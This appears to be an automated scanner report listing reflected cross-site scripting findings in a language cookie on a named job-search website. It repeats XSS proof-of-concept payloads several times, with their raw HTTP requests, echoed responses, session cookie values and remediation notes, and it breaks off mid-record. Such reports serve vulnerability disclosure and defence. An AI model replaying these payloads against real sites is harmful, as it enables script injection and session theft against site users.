<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENA7915";ALERT(1)//5A2F3F874B0\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90722"><img%20src%3da%20onerror%3dalert(1)>d3b228eaffa was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 90722"><img src=a onerror=alert(1)>d3b228eaffa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/services/schools/schsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en90722"><img%20src%3da%20onerror%3dalert(1)>d3b228eaffa; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:17 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en90722"><img src=a onerror=alert(1)>d3b228eaffa"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60e38"><img%20src%3da%20onerror%3dalert(1)>49f032b2ef was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 60e38"><img src=a onerror=alert(1)>49f032b2ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/FAQ.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en60e38"><img%20src%3da%20onerror%3dalert(1)>49f032b2ef; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:52 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en60e38"><img src=a onerror=alert(1)>49f032b2ef"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b39ba"%3balert(1)//5d5454969d8 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as b39ba";alert(1)//5d5454969d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/FAQ.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enb39ba"%3balert(1)//5d5454969d8; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENB39BA";ALERT(1)//5D5454969D8\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac724"><img%20src%3da%20onerror%3dalert(1)>da9bad07b8d was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as ac724"><img src=a onerror=alert(1)>da9bad07b8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/Login.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=enac724"><img%20src%3da%20onerror%3dalert(1)>da9bad07b8d; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:08 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enac724"><img src=a onerror=alert(1)>da9bad07b8d"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49afa"%3balert(1)//3811d504e1 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 49afa";alert(1)//3811d504e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/Login.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en49afa"%3balert(1)//3811d504e1; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:09 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN49AFA";ALERT(1)//3811D504E1\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fb25"%3balert(1)//0afab1b910d was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 5fb25";alert(1)//0afab1b910d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/contactus.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en5fb25"%3balert(1)//0afab1b910d; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:05 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN5FB25";ALERT(1)//0AFAB1B910D\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 990e3"><img%20src%3da%20onerror%3dalert(1)>5f5d51121c was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 990e3"><img src=a onerror=alert(1)>5f5d51121c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/contactus.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en990e3"><img%20src%3da%20onerror%3dalert(1)>5f5d51121c; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:56 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en990e3"><img src=a onerror=alert(1)>5f5d51121c"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2606f"><img%20src%3da%20onerror%3dalert(1)>ce87d810e71 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2606f"><img src=a onerror=alert(1)>ce87d810e71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/employeroverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en2606f"><img%20src%3da%20onerror%3dalert(1)>ce87d810e71; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:38 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en2606f"><img src=a onerror=alert(1)>ce87d810e71"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b6c6"%3balert(1)//2bb717da338 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2b6c6";alert(1)//2bb717da338 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/employeroverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en2b6c6"%3balert(1)//2bb717da338; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
